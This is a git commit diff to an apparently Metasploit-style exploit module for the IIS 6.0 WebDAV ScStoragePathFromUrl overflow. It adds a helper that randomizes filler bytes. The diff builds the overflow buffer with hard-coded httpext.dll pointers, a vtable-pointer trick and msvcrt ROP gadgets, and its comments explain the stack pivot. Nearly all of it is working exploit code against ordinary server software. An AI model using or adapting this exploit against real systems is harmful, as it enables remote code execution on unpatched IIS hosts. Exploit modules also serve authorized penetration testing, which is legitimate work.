Added make_junk function

lincoln-corelan · lincoln-corelan · commit 7ca0fe5a6809 · 2017-05-18T19:06:09.000-07:00
diff --git a/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb b/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
@@ -157,6 +157,11 @@ def utf_encode_str(str)
     return str.force_encoding('UTF-16LE').encode('UTF-8')
   end
 
+  #filler chars to be encoded
+  def make_junk(len)
+    return utf_encode_str(rand_text_alpha(len))
+  end
+
   def exploit
     # extract the local servername and port from a PROPFIND request
     # these need to be the values from the backend server
@@ -189,28 +194,28 @@ def exploit
       begin
         buf1 = "<#{http_host}/"
         buf1 << rand_text_alpha(114 - path_len)
-        buf1 << utf_encode_str(junk * 16)
+        buf1 << make_junk(32)
         #survive SHR instruction 0x02020202
         buf1 << utf_encode_str([0x02020202].pack('V'))
         #str pointer to .data httpext.dll # ebp-328 # used in wcslen calculation
         buf1 << utf_encode_str([0x680312c0].pack('V'))
-        buf1 << utf_encode_str(junk * 20)
+        buf1 << make_junk(40)
         #0x680313c0 -> destination pointer used with memcpy
         buf1 << utf_encode_str([0x680313c0].pack('V'))
         buf1 << ">"
         buf1 << " (Not <locktoken:write1>) <#{http_host}/"
         buf1 << rand_text_alpha(114 - path_len)
-        buf1 << utf_encode_str(junk * 14)
+        buf1 << make_junk(28)
         #0x680313c0  -> pointer to call itself at same address for vtable call
         buf1 << utf_encode_str([0x680313c0].pack('V'))
         #ROP 2 gadget -> advance ESP past previous instructions to start of ROP chain
         #msvct.dll 0x77bdf38d # ADD ESP,1C # POP ECX # POP EBX # POP EAX # RETN
         buf1 << utf_encode_str([0x77bdf38d].pack('V'))
-        buf1 << utf_encode_str(junk * 4)
-        #0x680313c0 -> vtable pointer passed to EAX for [call eax +24]
+        buf1 << make_junk(8)
+        #0x680313c0 -> vtable pointer passed to EAX for call [eax +24]
         #point to itself at [eax]
         buf1 << utf_encode_str([0x680313c0].pack('V'))
-        buf1 << utf_encode_str(junk * 8)
+        buf1 << make_junk(16)
         #ROP 1 gadget -> 0x68016082 stack flip get ECX into ESP and push EAX
         #which also points to new ESP
         buf1 << utf_encode_str([0x68016082].pack('V'))
